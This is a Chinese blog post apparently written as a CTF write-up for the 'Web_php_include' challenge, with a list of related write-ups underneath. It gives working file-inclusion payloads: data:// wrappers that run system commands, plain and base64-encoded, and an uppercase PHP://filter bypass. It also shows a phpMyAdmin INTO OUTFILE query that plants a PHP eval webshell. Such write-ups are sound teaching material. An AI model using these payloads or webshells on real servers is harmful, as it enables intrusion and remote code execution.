攻防世界-web-Web_php_include(文件包含与伪协议)

最新推荐文章于 2024-10-13 10:33:10 发布
最新推荐文章于 2024-10-13 10:33:10 发布
阅读量689 收藏 6
点赞数 2
文章标签: php 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77300311/article/details/130487360
版权
文章介绍了如何利用PHP代码注入,通过data://伪协议在禁止php://的情况下执行命令,包括使用base64编码规避过滤,并提到了phpmyadmin的登录与一句话木马的使用。此外,还讨论了大小写过滤的绕过策略。
摘要由CSDN通过智能技术生成

打开页面是下面一段代码

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

从代码中得知,page参数中带有php://的都会被替换成空。

strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。(区分大小写)。
str_replace() 函数以其他字符替换字符串中的一些字符(区分大小写)。

方法一(data://伪协议执行命令利用)

既然过滤了php://的伪协议,我们可以使用其他协议,这里使用data://伪协议。

data://伪协议

条件:

  • allow_url_fopen:on
  • allow_url_include:on

作用:

  • 自php>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。

用法:

  • data://text/plain,xxx(数据)
  • data://text/plain;base64,xxxx(base64编码后的数据)

1.1 使用data://text/plain,xxx(数据)

payload:

/?page=data://text/plain,<?php system("ls")?>

/?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>

1.2 使用data://text/plain;base64,xxxx(base64编码后的数据)

首先,查看本目录中是否有flag相关文件。

将 <?php system("ls")?> 先进行base64编码再urlencode后,构造data://伪协议,payload如下

/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4%3D

发现本目录中有3个文件,猜测其中fl4gisisish3r3.php为包含flag的文件。

然后,尝试查看fl4gisisish3r3.php内容,得到flag。

将 <?php system("cat fl4gisisish3r3.php")?> 先进行base64编码再urlencode后,构造data://伪协议,payload如下

/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik%2FPg%3D%3D

这里有一个坑,将以上payload复制到url中回车后,页面上并没有显示出flag。F12查看元素可以看到注释中的flag(如上图所示)。或者直接抓包也可以在响应中查看到flag(如下图所示)。

方法二(御剑+菜刀)

通过御剑扫描后台目录,发现了phpmyadmin登录地址

直接root登录,密码为空,登录成功。

写入一句话木马

SELECT "<?php eval(@$_POST['muma']); ?>"
INTO OUTFILE '/tmp/test1.php'

菜刀连接就行了 ,flag 在 www 下(竟然没连上,不知道为啥。。。) 

方法三(php://伪协议、大小写过滤)

由于strstr()函数和函数都是区分大小写的,那么我们完全可以使用大写的PHP://来绕过过滤。

如下图,使用PHP://input执行命令失败了,理论上不应该啊

下图使用PHP://filter读取文件倒是成功了。

/?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php

 

编程阿涛
关注
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3731
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界18-Web_php_include-CTFWeb进阶
最新发布
LH1013886337的博客
10-13 307
看名字可能是文件包含的题和。
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1358
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界Web_PHP_Include
Mrs_H的博客
10-04 622
攻防世界Web_PHP_Include 这是一道来自攻防世界web高手进阶题的其中一道题,题目很水,但是身为小白的我也遭遇到了各种各样的问题。所以写一下这道题我所用的wp思路,还有对于其他思路的一些看法。 法一 首先,我们先拿到了这道题的在线场景,打开一看 再结合着题目的意思这是一道文件包含题同时他过滤掉了php://伪协议,我第一反应就是换一个伪协议,将php://换成data://text/plain; 于是构造一个payload:?page=data://text/plain,<?%20sy
攻防世界Web_php_include
qq_44111753的博客
11-16 219
WP 攻防世界 Web_php_include 题目 WP 很明显,这题目和文件包含漏洞有关,来分析代码吧 <?php show_source(__FILE__); echo $_GET['hello'];//将hello参数的值输出 $page=$_GET['page'];//get参数提交的page值赋给page while (strstr($page, "php://")) {//若"php://"在page中出现过 $page=str_replace("php://", "", $p
php一些函数
m0_54015794的博客
01-15 293
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. ...
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 516
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 516
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
攻防世界-web-Web_php_include
wuh2333的博客
05-18 236
攻防世界php_web_include
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 6047
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界—— Web_php_include
weixin_45960266的博客
02-18 274
攻防世界—— Web_php_include 题目 解题 先读一下代码 1、获取一个hello 没啥用,后面也没有用到 2、page被包含了,这里page由地址栏动态获取 3、strstr函数,用于检验一个字符串是否出现过 4、str_place 字符串的替换 首先,查看源代码,没什么东西 因为是显而易见的文件包含,所以用filter全部转换看一下(这一步其实错了,因为已经可以看到源代码了,所以这一步没用且多余) 我还去解码了一下,啥用也没 又用input执行了命令 这里可以得到 all
攻防世界Web_php_include
2202_75317918的博客
04-13 869
攻防世界Web_php_include
攻防世界web_php_include
qq_60905276的博客
11-12 285
看到题目分析一波什么意思,首先前面Get hello这个参数没用。 要get page这个参数,然后循环匹配php://,接着把“php://”转换为“ ”。 有两种方法。 第一:大写绕过 因为我查到strstr()这个函数是区分大小写的,大写PHP://就可以绕过再用input输入要执行的命令就行了。 page=PHP://input 这个命令可以再url上直接输入,也可以在抓包后输入。 先查看文件目录 <php? system("ls");?> 发现文件,再显示文件...
攻防世界---Web_php_include
2201_75556700的博客
04-14 703
6.构造下面url,读取fl4gisisish3r3.php内容。5构造下面url,读取该路径的文件。4.构造下面url,得到目录路径。在网页上显示文本。
Web_php_include-攻防世界
szhangliwenya的博客
03-25 1437
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
include文件包含伪协议
weixin_62575261的博客
04-10 707
虽然学习了phpinclude文件包含基础,但是在实际的ctf题目中还是没有能够很好的运用,因此在本文写下在ctf中会用到的绕过方式 部分内容来源于https://www.csdn.net/tags/NtzacgzsODM1MDAtYmxvZwO0O0OO0O0O.html 首先是ctf-show萌新web题目14 题目过滤掉了很多元素,但是题目又提示了我们flag就在config.php文件里 看了很多大佬的做法,他们大部分是运用include文件包含来完成的 通过大佬的解释,这paylo
攻防世界-Web-Web_php_include
uh_eng的博客
08-05 379
0x01 打开题目,代码如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 构造payload简单验证一下是不是文件包含: ?hello=xxx&page=/etc/passwd 结果如下:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值